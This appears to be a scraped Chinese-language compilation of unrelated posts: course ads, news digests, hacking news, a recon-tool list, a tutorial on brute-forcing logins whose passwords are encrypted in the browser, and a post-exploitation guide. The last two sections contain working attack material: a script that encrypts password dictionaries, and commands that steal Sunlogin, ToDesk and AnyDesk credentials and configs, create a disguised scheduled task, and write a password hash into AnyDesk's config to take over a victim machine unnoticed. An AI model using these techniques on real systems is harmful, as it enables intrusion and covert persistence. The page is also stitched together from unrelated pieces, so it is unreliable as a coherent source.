课程介绍 个人职场生存的顶层设计是一套由职业导师提供的6节课程，旨在帮助职场人士做好个人的职业规划和发展。这套课程包括如何树立职业目标、如何定位自己、如何制定行动计划等内容，涵盖了从个人职业发展到管理能力提升的全过程。如果你渴望在职场上实现更高的成就，这套课程可以为你提供有力的支持和指导。 学习地址 百度：https://pan.baidu.com/s/1Hx9onzBNzsHfB2BHo8uNfg?pwd=py4s 天翼：https://cloud.189.cn/t/Qr2eAnnu6VJr（访问码：3kts） 阿里：https://www.aliyundrive.com/s/2JSaN6vFKUX 夸克：https://pan.quark.cn/s/8b1691c337fa...

6月26日，农历五月初九，星期一 在这里，每天60秒读懂世界 1、江苏扬州：在市区买改善性住房取消限购，其原有住房无需三年限售；上海：试点实现新建住宅"交房即交证"； 2、四川南充市南部县发布公告：6月27日零时起关闭全县猪肉经营场所24小时，以便彻底消毒； 3、新疆：6月28日-30日古尔邦节期间，收费公路小型客车免费通行3天； 4、川大张薇事件再掀波澜!北京一律所称不再招聘四川大学毕业生，称该校毕业生的品质难以让社会信服； 5、24日晚，兰州石化公司一装置发生爆鸣：明火燃烧猛烈，浓烟数公里外可见，官方：没有造成伤亡和污染； 6、台媒：台外事部门称"驻泰代表"庄硕汉涉性骚扰属实，已要求其辞职； 7、当地24日，美国密歇根州一场大型聚会现场发生斗殴及枪击事件，致2死15伤； 8、当地24日早，美国蒙大拿州一座桥梁倒塌，多节载危险物质的车厢坠河，车厢中装有沥青和熔融硫，事故没造成人员伤亡； 9、韩媒：一些韩国航空公司暂停部分韩中航班；韩外长：韩政府没理由与中方反目，将继续加强与中方沟通增进友谊； 10、外媒：以茶换油，以抵偿所欠的2.5亿美元石油款，伊朗和斯里兰卡贸易避开美元； 11、俄媒：反制日本，普京签令将9月3日为"反日本军国主义战争胜利纪念日"； 12、巴西总统称金砖五国将探讨美元地位，美财长回应：很难找到替代货币； 13、俄媒：武契奇称，有外国势力参与和支持"瓦格纳"叛乱事件；美媒：美国情报部门于6月中旬得知普里戈任正谋划在俄采取武装行动； 14、俄外交部对西方国家发出警告：不要做出任何可能利用俄罗斯国内局势来实现其恐俄目标的暗示； 15、外媒：经白俄调停，瓦格纳集团已撤离，俄方撤销对普里戈任刑事立案，其将前往白俄罗斯，俄国防部或收编部分士兵，俄分析师：事件如何发展还有待观察；美媒：美将推迟对"瓦格纳"新制裁，担心制裁可能会"协助"普京； 【微语】人生，并不全是竞争和利益，更多的是共赢！懂得感恩，便会幸运！...

　　香港云服务器是搭建网站选择最多的一款云服务器，也有很多优点，但无法防御DDOS攻击，网站一旦被攻击，会直接导致访问慢，更严重的可能会影响网站的优化排名效果，那么香港云服务器网站万一被ddos攻击了我们应该怎么办呢?有没有什么方法可以预防或防御ddos攻击呢?下面我们就一起来看看。 　　香港云服务器网站被攻击了怎么办? 　　虽然我们香港云服务器网站无法避免被DDOS攻击，但我们可以通过以下方法来减少或者抵御DDOS/CC等恶意流量的攻击： 　　1、限速：就像你们所理解的那样，对每个IP做速率限制。(只能对少量DDOS攻击有效，但不推荐，很容易影响正常用户的访问速度) 　　2、限制访问：对可疑来源一刀切，限制区域访问，只针对用户集中的地区提供服务。降低服务器的压力(不推荐，流量本身就比较少，又要限制地区，流量则会进一步减少) 　　3、增加带宽：提高香港云服务器带宽也可以防御DDOS攻击，但要想通过带宽来完全抵御攻击，成本会很高。 　　4、CDN：CDN节点可以有效的降低服务器压力，也有一定防御DDOS攻击的能力。 　　5、高防IP：只需短短几分钟即可接入华纳云香港高防IP，500G防御值。 　　6、高防服务：香港高防云服务器服务，专门针对香港云服务器被DDOS攻击服务，可以很好的帮助防御DDOS/CC攻击。 　　以上几种方法皆是在不换服务器的情况下帮助香港云服务器减少和抵御DDOS/CC攻击，另外我们还可以换至拥有高防御的香港高防服务器，以杜绝频繁的DDOS流量攻击。 文章来源于互联网:香港云服务器网站被攻击的解决方法 (window.slotbydup = window.slotbydup || []).push({ id: "u6203766", container: "_l92wqljl64", async: true }); ...

美国当局证实，在逮捕其管理员Fitzpatrick三个月后，他们已经查封了与BreachForums门户网站相关的两个域名：breached.vc与breached.to。BreachForums网站是一个公认的数据泄露论坛，在暗网与明网均可以访问，用于泄露攻击中窃取的数据库和信息。 尽管该网站的所有者康纳·菲茨帕特里克（Conor Fitzpatrick，又名Pompompurin）于3月份被当局拘留，但与该网站相关的域名仍然处于活动状态，尽管访问时会显示服务器错误相关的消息。这表明当局当时可能仍无法完全控制该域名的基础设施。 然而，最近BreachForums网站的域名已经开始显示当局的扣押信息（被扣押的提示），同时表明该域名将与该门户网站有关，现在看来这已经被他们扣押。 当一个域名被当局扣押时，它通常总是显示相同的通用消息——一张图像，通知该域名已被扣押。有趣的是，目前该论坛显示的图像还出现了Pompompurin的论坛卡通头像，但却戴着手铐。 同时，Pompompurin网站的个人域名也被当局查封，显示相同的信息。 请注意，即使网站域名已被查封，BreachForums论坛在Tor网络上的暗网网站地址仍然可以正常工作，没有任何警告，只是显示404错误消息。 重要的是要记住，自从最初的门户网站及其管理者被捕以来，一些与Pompompurin关系密切的前成员已经开始创建自己的替代版本，目前已经有几个现有的版本，包括一些也是由模仿者创建的网站。 如，Exposed论坛，曾因泄露Raidforums的用户数据库而收获了广泛的知名度，一度被认为是已宣布关闭的Breached论坛的替代品。 “Pompompurin”的合伙人“Baphomet”，在关闭Breached论坛数周后，宣布重新启动Breached论坛，并称新的Breached论坛的地址为：https://breachforums.vc。 更多暗网新闻动态，请关注“Kirin博客”。...

6月25日，农历五月初八，星期日 在这里，每天60秒读懂世界 1、文旅部：2023年端午节假期，全国国内旅游出游1.06亿人次，同比增长32.3%，实现国内旅游收入373.10亿元； 2、24日凌晨，广西北部湾发生5.0级地震，震源深度20公里，全省多市震感明显，暂未收到人员伤亡报告； 3、23日下午，浙江龙游发生5车追尾事故，并引发燃烧，已造成6死2伤；24日晚，甘肃兰州西固区一企业发生闪爆事故，网友：事故现场为一座装置起火闪爆，并冒起浓烟，目前伤亡情况不详； 4、银川31死爆炸事故原因公布：两人擅自更换与液化气罐相连接的减压阀，导致液化气罐中液化气快速泄漏，引发爆炸； 5、手机QQ支持微信登录了：QQ和微信实现账号互通； 6、24日凌晨，香港一客机中止起飞致11名乘客受伤，国泰航空：技术故障，将配合调查； 7、台媒：台湾竹北市24日发生多起瓦斯外泄和气爆事件，多名居民被炸伤； 8、美方以涉芬太尼问题逮捕和起诉中国公民和企业，外交部：美方诱捕中国公民，并悍然再次起诉中国实体和个人，中方对此予以强烈谴责，已提出严正交涉和强烈抗议； 9、外媒：传荷兰最早下周发布新出口管制措施，限制ASML对华半导体设备出口； 10、外媒：马斯克的SpaceX将出售内部股票，公司估值增至1500亿美元； 11、泰国和美国两地大量鱼类死亡，专家：或与海洋异常升温有关； 12、"瓦格纳"领导人普里戈任称：俄军袭击瓦格纳营地，俄军否认称：其因号召武装叛乱被立案。外媒："瓦格纳"已占领俄南部军区指挥部，"正在穿越"利佩茨克州往莫斯科方向，俄军正在莫斯科市郊挖战壕，架设机枪阵地，莫斯科及沃罗涅日已进入反恐状态； 13、普京指责普里戈任"叛国"。普里戈任：不是叛国，目的是将俄从腐败中解救；卡德罗夫：完全支持普京，车臣士兵已前往；俄警方在他办公室搜出40亿卢布现金，普里戈任：发工资和抚恤金的钱； 14、普京签署法律：允许戒严期间征召有犯罪记录公民入伍；俄国防部:乌克兰军队试图利用“瓦格纳”部队挑衅的机会发动反攻；普里戈任喊话国防部长：来见我； 15、美媒：白宫官员称，美方正关注俄国内局势，拜登已听取相关简报；欧盟："瓦格纳"事件属于俄内政，正密切关注；土媒：埃尔多安告诉普京，土方准备为尽快和平解决俄国内所发生事件出力； 【微语】不要等错过了才悔恨，不要等老了才怀念。抓住当下，再苦再累也要展翅飞翔。...

侦察（Recon）是渗透测试的第一步，也是至关重要的一个阶段，通过侦查，渗透测试或红队人员可以了解目标并制定有针对性的行动策略。以下，我们将介绍十个值得所有渗透测试人员收入武器库的开源侦察工具。 1 Altdns 在渗透测试或SRC漏洞挖掘中，安全测试人员通常会得到一些域名资产。为了更好地进行渗透测试，通常都需要进行子域名收集。 Altdns是一款运用置换扫描技术的子域发现工具，它可以帮助我们查找与某些排列或替换匹配的子域。AltDNS接受可能存在于域下的子域中的单词(例如测试、开发、分期)，以及获取你知道的子域列表。 使用者只需提供两个输入列表，Altdns就可以为我们生成输出大量可能存在的潜在子域并保存。这些保存好的子域列表，可供你喜欢的DNS暴力破解工具使用。 地址： https://github.com/infosec-au/altdns 2 Amass OWASP Amass项目使用开源信息收集和主动侦察技术对攻击面和外部资产发现进行网络映射。 Amass非常流行，因为它具备更好的数据一致性和与其他工具的集成性。Amass是一个值得信赖的工具，可用于概念验证和参与证明，并且更容易说服客户使用它来定期映射组织的攻击面。 地址： https://github.com/owasp-amass/amass 3 Aquatone Aquatone是一种用于跨大量主机对网站进行可视化检查的子域名挖掘工具，便于快速获取基于HTTP的攻击面的概述。Aquatone不仅仅只是通过简单的子域爆破，它还会利用各种开放的互联网服务和资源，来协助其完成子域枚举任务，这也大大提高了子域的爆破率。 当发现子域时，我们还可以使用Aquatone来探测主机的公共HTTP端口，并收集响应头、HTML和屏幕截图，并能最终为我们生成一个报告，便于我们后续的分析利用。 地址： https://github.com/michenriksen/aquatone 4 Assetfinder Assetfinder是一种基于Go的工具，用于从各种来源（包括Facebook、ThreatCrowd、Virustotal等）中查找可能与目标域名域相关的域名和子域名。Assetfinder使用各种来源，包括可以提供相关信息的信息安全空间和社交网络中的来源： crt.sh certspotter hackertarget threatcrowd wayback machine dns.bufferover.run facebook virustotal findsubdomains 地址： https://github.com/tomnomnom/assetfinder 5 Gobuster Gobuster是一种用于暴力破解的工具，破解对象如下： 网站中的URI（目录和文件） DNS子域（支持通配符） 目标Web服务器上的虚拟主机名 打开亚马逊S3存储桶 打开谷歌云存储桶 TFTP服务器 地址： https://github.com/OJ/gobuster 6 Gotator Gotator是通过排列生成DNS单词列表的工具。 地址： https://github.com/Josue87/gotator 7 HTTPX HTTPX用于Python 3的全功能型HTTP客户端库。它包括一个集成的命令行客户端，支持HTTP/1.1和HTTP/2，并提供同步和异步API。 地址： https://github.com/encode/httpx 8 Naabu Naabu是用Go编写的端口扫描工具，可以快速可靠的方式枚举主机的有效端口。Naabu是一个非常简单易用的工具，可以对主机/主机列表进行快速SYN/CONNECT/UDP扫描，并列出返回的所有端口。 地址： https://github.com/projectdiscovery/naabu 9 MASSCAN：大规模IP端口扫描仪 MASSSCAN是一个互联网规模的端口扫描仪。它可以在5分钟内扫描整个互联网，从一台机器每秒传输10万个数据包。它的用法（参数、输出）类似于最著名的端口扫描器Nmap。 地址： https://github.com/robertdavidgraham/masscan 10 WhatWeb：下一代Web扫描仪 WhatWeb是一个Web应用程序指纹识别工具，适用于各种Web技术，包括内容管理系统（CMS）、博客平台、统计/分析包、JavaScript库、Web服务器和嵌入式设备。WhatWeb有超过1800个插件，每个插件都可以识别不同的对象。WhatWeb还可以识别版本号、电子邮件地址、帐户ID、Web框架模块、SQL错误等。 地址： https://github.com/urbanadventurer/WhatWeb  ...

前言 目前越来越多的网站系统在登录接口、数据请求接口中加入各式各样的加密算法，甚至有些网站在每次请求前都动态请求加密密钥等措施，对接口渗透工作造成较大障碍，本文简单对登录接口暴力破解时字段被加密，如何处理加密内容进行暴破来进行一个简单的分享。 常见方法和思路 1、分析找出是哪个js文件进行了password参数值的加密,将该js导入本地动态执行，建一个小型的web服务器，利用浏览器页面将js运行起来，把账号密码发给本地这个服务器，然后本地js执行加密之后把加密的值再给登录的请求，实现普通的发包爆破。  2、利用selenium webdriver,本地驱动一个浏览器,完全模拟浏览器的操作,实现浏览器自动登录爆破.  3、通过对js里的加密算法进行破解，或者是理清加密流程，然后利用自己熟知的编程语言实现同样的加密方式，写一个效果一样的加密方式，然后把代码嵌入到发包爆破代码里，这种方式字典里账号密码传入的时候，先进行加密再传给登录请求。  4、利用前面的方法，把密码字典全部加密之后生成对应加密字典，然后普通发包爆破的时候传入加密的字典。 实例1 工作中遇到的一个登录页面，发现登录账号密码都是经过js加密之后再请求发送（通过抓包可以看到加密信息） burp抓到的包,request的GET的登录包，很明显可以看到param1,param2参数的值是经过前端加密之后再进行传输的，遇到这种情况,普通发包的爆破脚本就很难爆破成功，本次页面中存在滑动验证码，通过burp重放尝试发现该验证码无效。 存在验证码重用的问题，但是请求加密了不能直接进行爆破。所以我们需要分析前端加密代码逻辑。 根据关键字快速定位加密字段 打开浏览器调试模式，根据请求包的关键字在js脚本中进行搜索进帮助我们快速定位,定位到一个ajax请求 该请求中使用了suser 字段和spwd参数，在js中继续寻找参数出现的位置，找到如下代码 可以看到调用了entryt.encrypt()函数对输入的用户密码进行了加密处理，继续寻找函数定义位置，发现在另一个js中进行的定义 一眼看过去，采用AES加密，key 和iv 都有了，使用在线的加密工具验证一下，登录页面中用户名密码均填写tide，传输中的加密字段为4942b13dc0e541615f52f0a3cb4b321f，用户名密码采用相同的加密算法， AES加密验证：4942b13dc0e541615f52f0a3cb4b321f，在实际测试过程中因为输出编码没有修改这里绕了一个大圈，以为是不对的见下图，实验过程中是从页面中继续提取JS进行的测试， 正确输出方式 此时可通过Python脚本对字典通过该加密方式进行加密后破解，如果验证不正确的话可以继续在前台页面中寻找加密的js代码通过加载js进行加密，本次实验我们继续在页面查找具体加密的js文件，找到包含CryptoJS的js文件如下 aes算法的js 编写脚本加密字典 编写一个html页面使用站点前台的js文件对字典文件进行加密，html代码如下： <!DOCTYPE html> <script src="core-min.js"></script> <script src="aes.js"></script> <script src="jquery-2.0.2.min.js"></script> <html lang="zh"> <head>   <meta charset="UTF-8" />   <title>EncryptionStr</title> </head> <body>   <div>     <input type="file" name="file" multiple="multiple" id="files" onchange="choosefile()" />     <div id="name"></div>     <textarea id="text" cols="100" rows="50"></textarea>   </div>   <script type="text/javascript">   var entryt = {     encrypt: function (str, key, iv) {         if (!key || !iv) {             key = "1234567890abcdefghijklmnopqrstuv";             iv = "1234567890abcdef";         }         var _key = CryptoJS.enc.Utf8.parse(key);         var _iv = CryptoJS.enc.Utf8.parse(iv);         var srcs = CryptoJS.enc.Utf8.parse(str);         var encrypted = CryptoJS.AES.encrypt(srcs, _key, {             iv: _iv,             mode: CryptoJS.mode.CBC,             padding: CryptoJS.pad.Pkcs7         });         return encrypted.ciphertext.toString();     }  }      function choosefile () {     var fileList = document.getElementById('files').files;     var nameStr = '';     for (var i = 0; i < fileList.length; i++) {         nameStr += `${i === 0 ? '' : ', '}${fileList[i].name}`;         var reader = new FileReader();         reader.readAsText(fileList[i], "UTF-8");         reader.onload = function (e) {             var content = e.target.result;    const arr = content.split("n");    for (var i=0;i<arr.length;i++)    {     //document.getElementById('text').value=document.getElementById('text').value+arr[i]+"n"; //加密前     document.getElementById('text').value=document.getElementById('text').value+entryt.encrypt(arr[i])+"n"; //加密后    }          }     }     document.getElementById('name').append(nameStr);   }   </script> </body>   </html> 加密用户名字典效果如下： 使用加密后的字典对用户名进行猜解 实例2 遇到如下登录页面，点击登录的时候也存在滑块验证码，但经过测试该数据包仍可重放。 同样，查看页面源码页面发现存在登录按钮事件 继续查找登录按钮事件找到滑块验证结束后会调用this.onSuccess()函数 this.onSuccess()函数如下，可以看到在对密码加密过程中调用了rsaEncrypt函数 通过引用文件找到rsaEncrypt在./secret.js 文件中定义 最终找到RES加密算法的公钥和私钥，可通过编写脚本使用该公钥对密码字典进行加密后爆破 工具提高生产力 「使用 BurpCrypto 插件」 通过上面的分析已经知道登录页面使用了AES加密，BurpCrypto 默认集成了AES加密模块， 先添加一个Processor Processor选择我们刚才添加的 最总效果 RAS算法配置 工具下载 扫描下方二维码进群下载     总结 前端小白，整体内容并不复杂，相对正常测试加入了一部分前端的内容，当我们遇到前端加密的时候可以通过找找加密算法进行进一步利用。  ...

女子与陌生人共享屏幕，结果背负近百万贷款债务； IT之家 6 月 20 日消息，据荔枝新闻报道，近日，常州市公安局经开区分局潞城派出所接到一起特殊的诈骗案件。一名姓周的女子在接到一个自称是京东金融工作人员的陌生电话后，被对方以征信问题为由，诱导她下载视频会议软件，并在屏幕共享的情况下，从十多个平台贷款并转账，最终背负了近百万贷款债务。据周女士回忆，当天她接到一个陌生电话，对方自称是京东金融工作人员，并准确说出了她的姓名和地址。对方告诉她，由于京东金融下架整改，她的金条账户会产生高额的滞纳金和管理费，需要她注销关闭账户，否则会影响她的个人征信。周女士信以为真，于是按对方指导，下载了“腾讯会议”App，并开启屏幕共享。在屏幕共享的过程中，对方冒充官方给周女士发送了一封包含征信报告和安全账户的邮件，并让她查看自己已经安装的京东、微信微粒贷等 App 上的贷款功能，并骗她上面的数字是不良征信记录，要全部清空额度，并转入“银证对接账户”，才能修复个人征信。周女士不知道的是，所谓的清空额度，其实是将自己的信用贷款转到骗子账户。而所谓的银证对接账户，也是骗子账户。不仅如此，对方还要求周女士下载安逸花、美团、携程等 App 查看是否存在不良征信，并重复上述操作。就这样，在所谓“京东客服”的引导下，周女士从十多个平台贷款并转出，背负了近百万贷款债务。当周女士意识到自己被骗时，已经为时已晚。她立即报警，并向警方说明了事情的经过，目前案件正在进一步调查中。IT之家注意到，这是一种新型的诈骗手段，利用视频会议软件实现屏幕共享，从而控制受害人的手机操作。常州市公安局经开区分局潞城派出所民警卜雅倩提醒市民：“个人征信由中国人民银行及其派出机构统一管理，任何机构和个人无权随意删除或修改信用报告中展示无误的不良信息。不要轻易下载视频会议软件，更不要在共享屏幕时进行银行账户操作。如果遇到类似情况，请及时挂断电话，并向警方报案。” 黑客论坛 15,000 美元出售美方军事卫星接入 据称，这颗卫星据称由美国著名空间技术公司 Maxar Technologies 所有。而有人表示，访问这颗卫星可能会提供对美国境内军事和战略定位的了解。 活跃在俄语黑客论坛上的一名黑客发布了一则广告，出售Maxar Technologies运营的一颗军用卫星的访问权限。这家总部位于科罗拉多州的空间技术公司专门制造用于通信、地球观测、雷达和在轨服务的卫星。黑客的说法表明，潜在买家可以获得有关美国军事和战略定位的敏感信息。尽管这些说法的真实性仍不确定，但黑客提出使用托管（一种值得信赖的第三方支付服务）的事实增加了该提议的可信度。此访问的广告价格已定为 15,000 美元。值得注意的是，未经授权访问军事卫星可能会产生严重的法律和安全后果。 AT&T 访问广告（图片来源：Hackread.com） 由于军事卫星在监视、通信和战略行动中发挥着至关重要的作用，这种访问违规的影响是重大的。任何未经授权访问这些系统都可能危及国家安全并构成严重威胁。 还出售 AT&T 电子邮件的访问权限 在 Hackread.com 观察到的相关帖子中，同一黑客还以 7,000 美元的价格提供AT&T 公司的电子邮件帐户访问权限。黑客声称，所提供的访问权限将禁用双因素身份验证 (2FA)，从而使帐户容易受到潜在的网络攻击。AT&T 是一家总部位于美国的大型电信公司，处理大量敏感信息，包括客户数据和公司通信。破坏这些电子邮件帐户可能会泄露机密信息，并可能导致进一步的未经授权的活动。 虽然这些说法的可信度和合法性尚未得到证实，但 Maxar Technologies 和 AT&T 必须立即采取行动，调查潜在的安全漏洞并解决任何潜在的漏洞。此外，个人和组织保持警惕、定期更新安全措施并利用强大的身份验证协议来防止未经授权的访问和网络威胁至关重要。执法机构、网络安全公司和受影响的公司应合作彻底调查这些指控，识别潜在漏洞，并采取必要措施确保其系统和数据的安全性和完整性。 多次销售 这并不是第一次发现俄语黑客论坛提供对美国关键网络基础设施的访问。今年3月，美国法警局的数据被发现在俄罗斯论坛上出售。黑客以 15 万美元的价格提供 350 GB 的数据。2021年5月，FBI就多个俄罗斯黑客论坛上出售美国各大学的网络凭证和VPN访问信息发出警告。FBI 透露，出售的信息主要是通过勒索软件、鱼叉式网络钓鱼和其他网络攻击获得的。  ...

黑客团伙盗卖百万条个人信息！厦门警方全链条捣毁，横跨4省抓获7人 黑客团伙攻击厦门一科技公司系统，非法获取公民个人信息百万余条并出售，非法获利约40万元。近期，厦门市公安局网安支队联合思明分局横跨4省市，成功打掉一个集黑客攻击、数据清洗、买卖信息、提供资金、数据使用等为一体的全链条网络犯罪团伙，破获某公司被侵犯公民个人信息案，抓获犯罪嫌疑人7名，查获非法获取的公民个人信息100万余条。 公司系统被攻击 导致用户信息泄露 2月3日，厦门市思明区某科技公司报警称，其运营的计算机系统被恶意攻击，导致用户信息泄露。接报后，省、市、区三级公安机关立即组建专案组开展侦查攻坚。经过一周研判，专案组从数百万条数据中抽丝剥茧，精准搜集嫌疑人作案遗留信息，还原嫌疑人作案过程，进而研判出该犯罪团伙的组织架构、作案手法及团伙成员等情况。 2月15日，专案组民警连夜奔赴黑龙江哈尔滨，次日将犯罪嫌疑人杨某（男，31岁，黑龙江人）抓获。经突审，犯罪嫌疑人杨某对其使用黑客手段获取公民个人信息并利用聊天软件贩卖的行为供认不讳。 警方顺藤摸瓜，抓获协助杨某进行黑客攻击的陈某（男，35岁，黑龙江人），同时赶赴辽宁沈阳，在沈阳至哈尔滨的高速公路一路口抓获唆使他人非法获取公民个人信息的马某（男，41岁，黑龙江人）、非法获取公民个人信息的李某涛（男，35岁，广东人）。 售卖百万条个人信息 非法获利40万元 根据现场取证及前期后端的研判情况，专案组立即转战江西，成功抓获购买及使用数据进行产品推销的刘某海（男，39岁，江苏人）、黄某南（男，31岁，广东人），并在浙江抓获非法倒卖公民个人信息、从中赚取差价的“中间商”汪某波（男，34岁，湖北人）。至此，这一集黑客攻击、数据清洗、买卖信息、提供资金、数据使用等为一体的全链条网络犯罪团伙被全链条捣毁。 初步查明，1月下旬，犯罪嫌疑人马某伙同杨某、陈某、李某涛为非法牟利，通过黑客技术攻击被害公司系统，非法获取公民个人信息100万余条，并以每条0.7元至1元不等的价格售卖给汪某波，非法获利约40万元。汪某波转手将这些公民个人信息售卖给刘某海、黄某南用于商品推销。 目前，7名犯罪嫌疑人均因涉嫌侵犯公民个人信息罪被依法采取刑事强制措施，其中4名嫌疑人被警方移送审查起诉。被黑客攻击泄露公民个人信息的企业及法人也因未履行网络安全保护义务，被思明警方处以行政处罚。案件仍在进一步深挖中。   俄三大黑客组织联合对欧洲银行发动攻击 16日，俄罗斯三大黑客组织联合宣布：将在48小时对欧洲银行发动沉重打击！ 俄罗斯三大黑客组织集体行动，这一次主要任务是瘫痪SWIFT 的工作，对欧洲银行系统进行大规模网络攻击，目标包括：欧洲、美国和美国联邦储备委员会的银行。 48小时之内，三大黑客组织计划对欧洲银行系统进行大规模的计算机攻击。 值得注意的是，这些计算机黑客组织，在高效和破坏性的计算机攻击方面有着长期的记录。 美国网络安全技术公司曾经发表了一篇报道，里面有个世界各国黑客的“突破时间”排名，其中俄罗斯黑客以18分49秒成功拿下第一，稳坐世界黑客头把交椅，远远领先于第二名朝鲜的2小时20分14秒。 毫不夸张地说，全世界的黑客只有两种，一个是俄罗斯黑客，还是一个是其他国家黑客。 声称将是历史上最强大的网络攻击 俄黑客组织声称这将是“历史上最强大的网络攻击，在接下来的48小时内摧毁欧洲银行。这场毁灭性的网络攻击将切断向乌克兰提供军事援助的资金流动。” 其中有些黑客组织已为大众熟知，“Killnet”（杀网/杀戮网络）的黑客行动主义者，与“Revil”（邪恶）的代表（长期以来被认为已被击败）以及“Anonymous”（匿名者）的成员表示，他们联合起来实现这一目标。 绰号为“Killmilk”的“杀网”领导者证实，袭击的准备工作已经在进行中，预计将在接下来的48小时内开始。 “没有钱，没问题。杀网对欧洲金融基础设施非常熟悉。”该组织的代表威胁说。 “Anonymous”（匿名者）的一名成员还指出，欧洲金融机构将见证“世界近代历史上最强烈的网络攻击”。他敦促他们为即将到来的打击做好准备，并表示当打击发生时，“再修复任何东西都为时已晚”。 “许多欧洲银行将成为目标，我们将毫不留情地打击。”匿名者的代表总结道。 “杀网”发布的关于摧毁欧洲银行系统的视频截图 据媒体报道，Killnet 最近是几个北约网站、FBI 数据库和汉莎航空 IT 中断事件的幕后黑手。 除了对银行的直接攻击外，黑客还可能将目标对准SWIFT系统，该系统是大多数国际银行交易的基础，然而，部分专家怀疑这样的攻击是否会成功。 据报道，网安专家叶夫根尼·戈尔博夫表示，由于银行系统涉及多层保护，宣布的大规模攻击不太可能成功。 戈尔博夫表示：“要对欧洲的银行系统进行网络攻击，您必须先破解它，一切都由多个数据中心控制，对其中一个的攻击不会解决任何问题，即使他们将其关闭一天或一周，银行系统也不会崩溃并且会继续运作，一些银行可能会受到攻击，但不太可能导致灾难性后果。” 这次全球网络攻击利用了“几个美国联邦政府机构”广泛使用的软件中的一个缺陷。美国联邦政府(15日)多个机构遭到的网络攻击，具体程度尚未清楚。而另一起针对西方金融系统的攻击，则由一个组织在那里行动，据说是与俄罗斯有关联的黑客。 美国网络安全和基础设施安全局(CISA)在给CNN的一份声明中证实了这些攻击。CISA网络安全执行助理主任 Eric Goldstein：“CISA正在为经历过入侵的几个联邦机构提供支援。我们正在紧急工作以了解影响并确保及时补救。”...

前言 在内网渗透过程中，会碰到远程控制soft或者其他，这里针对远程控制软件做如下总结。远程控制软件 向日葵篇 向日葵查看版本 向日葵（可以攻击） 针对向日葵的话其实如果有本地安装的话，是... 前言 在内网渗透过程中，会碰到远程控制soft或者其他，这里针对远程控制软件做如下总结。 远程控制软件 向日葵篇 向日葵查看版本 向日葵（可以攻击） 针对向日葵的话其实如果有本地安装的话，是有可能存在漏洞的。这里进行复现 向日葵个人版for Windows &lt;= 11.0.0.33 向日葵简约版 &lt;= V1.0.1.43315（2021.12） 测试客户端漏洞版本:11.0.0.33162 攻击过程： （1）tasklist 查看是否有sunlogin的进程（2）直接用golang的工具来进行攻击即可 https://github.com/Mr-xn/sunlogin_rce 向日葵（不可以攻击） 遇到不可以攻击的向日葵，我们也有几种渗透手法： （1）窃取配置文件来进行解密（低版本 版本号具体未知） 低版本的向日葵把密码和机器码加密写入到了配置文件中，我们可以把配置文件down到自己的机器上，然后进行重开向日葵即可。这里向日葵版本较低，就不进行测试 （2）在12.5.2之前的某些版本可以写到了注册表中，所以可以使用注册表来进行查询 reg query HKEY\_USERS\\.DEFAULT\\Software\\Oray\\SunLogin\\SunloginClient\\SunloginInfo   reg query HKEY\_USERS\\.DEFAULT\\Software\\Oray\\SunLogin\\SunloginClient\\SunloginGreenInfo   向日葵默认配置文件路径:  安装版：C:\Program Files\Oray\SunLogin\SunloginClient\config.ini  便携版：C:\ProgramData\Oray\SunloginClient\config.ini  本机验证码参数：encry_pwd  本机识别码参数：fastcode(去掉开头字母)  sunlogincode：判断用户是否登录状态   在向日葵高于 12.5.3.* 的机器中已经没有办法获取secert了 todesk篇 常见渗透方式（偷配置，百试百灵） 这里还是和前面的向日葵一样，可以进行配置文件的窃取，这里的默认安装路径（C:Program FilesToDeskconfig.ini） 这里咱们可以攻击机安装todesk，然后读取到config.ini中的配置文件，然后和攻击机进行替换即可。这里我虚拟机假装是受害机，读取出来，然后攻击机把tempauthpassex进行替换。 本机下载todesk进行替换。 两个机器密码相同（进行替换的时候需要修改攻击机密码更新频率） anydesk anydesk的配置文件在 C:\Users\用户名\AppData\Roaming\AnyDesk   文件中 而通常这个时候我们有权限修改anydesk的配置文件，这里进行测试，起两个虚拟机，设定一个场景（攻击机拿到了webshell，受害机开着windows defender，如何去渗透拿到受害机权限） 攻击机 ip: 10.211.55.3 + 10.211.55.2 受害机 ip: 10.211.55.4（windows defender全开） 情景复现 这里拿到了受害机的webshell，是个普通权限，无法去关闭 这里可以看到有windows defender来运行，这里无法进行关闭windows defender 这里用powershell来执行远程命令下载anydesk到用户的目录中去,因为虚拟机只有C盘，所以我创建了一个目录来进行存放，在真实的渗透过程中，一般是有RWE的目录 这里用powershell来执行远程命令下载anydesk到用户的目录中去,因为虚拟机只有C盘，所以我创建了一个目录来进行存放，**在真实的渗透过程中，一般是有RWE的目录** 上传上去之后，先不去打开。转到攻击机进行操作 （1）这里先去给攻击机下载anydesk（如果下载过的小伙伴，要先清除） C:Users用户名AppDataRoamingAnyDesk中的配置，没有的就不用看这一步，清除结束后如下 （2）这里打开攻击机的anydesk，牢记我此处勾选的id，然后点击右上角的概述-->为自主访问设置密码-->设置一个密码（这里设置为Q16G666!!）--->之后点击应用，攻击机完全退出anydesk（小托盘也要退出），并且退出时不选择安装anydesk （3）攻击机完全退出anydesk（小托盘也要退出），这里还是到配置文件下 C:Users用户名AppDataRoamingAnyDesk，然后把文件复制下来。是我图中勾选的这四个。复制完成之后，攻击机将文件进行删除。 复制下来之后，给受害机的当前用户（拿到权限的用户）找到anydesk配置文件路径并且复制到其他（如果没有配置文件路径则进行创建配置文件路径），一定要注意这里攻击机复制完之后，一定要将攻击机中的配置文件进行删除 （4）重新打开攻击机，生成配置文件，启动受害机的anydesk。 （5）用攻击机进行连接，这里连接的id就是（2）中截图的id，密码就是（2）中设置的密码即可成功无感绕过windows defender 情景复现2 （计划任务） （1）确定用户创建计划任务 如果命令行不能去执行，则可以去创建计划任务去执行，例如，必须先确定当前用户，在当前用户的目录下执行anydesk， powershell "(((Get-WmiObject -Class Win32_Process -Filter 'Name=\"explorer.exe\"').GetOwner().user) -split '\n')[0] schtasks /Create /TN Windows_Security_Update /SC monthly /tr "C:\Users\testuser.G1TS\Desktop\anydesk.exe" /RU 用户名 执行计划任务 schtasks /run /tn Windows_Security_Update 后续步骤和上面相同   然后添加密码到配置文件中去即可。 echo ad.anynet.pwd_hash=85352d14ed8d515103f6af88dd68db7573a37ae0f9c9d2952c3a63a8220a501c &gt;&gt; C:Users用户目录AppDataRoamingAnyDeskservice.conf echo ad.anynet.pwd_salt=cb65156829a1d5a7281bfe8f6c98734a &gt;&gt; C:Users用户目录AppDataRoamingAnyDeskservice.conf 然后查看用户的id type C:Users用户名AppDataRoamingAnyDesksystem.conf 连接即可 优点： 整个过程都不需要进行UAC弹窗，真正实现了无感绕过 缺点： （1）会弹出anydesk的界面，导致一些问题 